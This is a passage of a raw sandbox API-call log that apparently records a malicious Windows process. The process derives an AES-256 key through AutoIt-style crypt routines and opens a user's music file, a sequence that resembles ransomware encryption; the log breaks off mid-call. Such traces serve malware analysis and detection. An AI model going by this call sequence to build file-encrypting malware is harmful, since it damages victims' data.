1 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aJ1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lagIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="agIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gIQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qtz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tz\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KQpDY.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.443] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.443] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0184.443] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0184.443] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0184.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0184.443] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0184.443] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0184.443] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0184.443] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0184.443] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.443] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6a4a880, ftCreationTime.dwHighDateTime=0x1d5d87d, ftLastAccessTime.dwLowDateTime=0xd95b64b0, ftLastAccessTime.dwHighDateTime=0x1d5df54, ftLastWriteTime.dwLowDateTime=0xd95b64b0, ftLastWriteTime.dwHighDateTime=0x1d5df54, nFileSizeHigh=0x0, nFileSizeLow=0x1bd9, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="KQpDY.m4a", cAlternateFileName="")) returned 0x90ae18 [0184.443] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0184.444] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.444] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0184.444] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.444] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.444] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0184.444] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.444] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0184.444] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.444] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.444] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0184.444] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.444] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.444] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.444] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.444] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.444] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0184.445] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.445] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0184.446] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.446] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.446] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0184.446] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.446] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.446] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.446] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.446] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.446] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0184.446] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.446] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.446] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.447] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.447] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.447] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.447] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0184.447] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.447] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.447] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0184.447] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.447] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.448] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0184.448] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.463] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.463] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0184.463] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.463] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.463] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.463] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.463] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.463] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.463] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.463] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0184.463] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.464] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.464] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0184.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.464] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0184.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.464] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.464] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.464] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.464] CryptHashData (hHash=0x90af58, pbData=0x8ded80, dwDataLen=0x19, dwFlags=0x1) returned 1 [0184.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.464] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.464] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.465] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0184.465] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.465] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.465] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0184.465] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.465] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.465] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.465] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.465] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.465] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.465] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0184.465] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.465] CryptDestroyHash (hHash=0x90af58) returned 1 [0184.465] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.465] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.465] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.465] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.465] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.467] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\kqpdy.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0184.467] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.467] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0184.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0184.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0184.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0184.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0184.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0184.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0184.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0184.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.467] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0184.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0184.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0184.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0184.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0184.468] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0184.468] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0184.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0184.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0184.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0184.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0184.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0184.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0184.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0184.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0184.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0184.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0184.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0184.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0184.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0184.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0184.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0184.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0184.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0184.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0184.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0184.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0184.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0184.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0184.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0184.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0184.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3478 [0184.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0184.469] RtlAllocateHeap 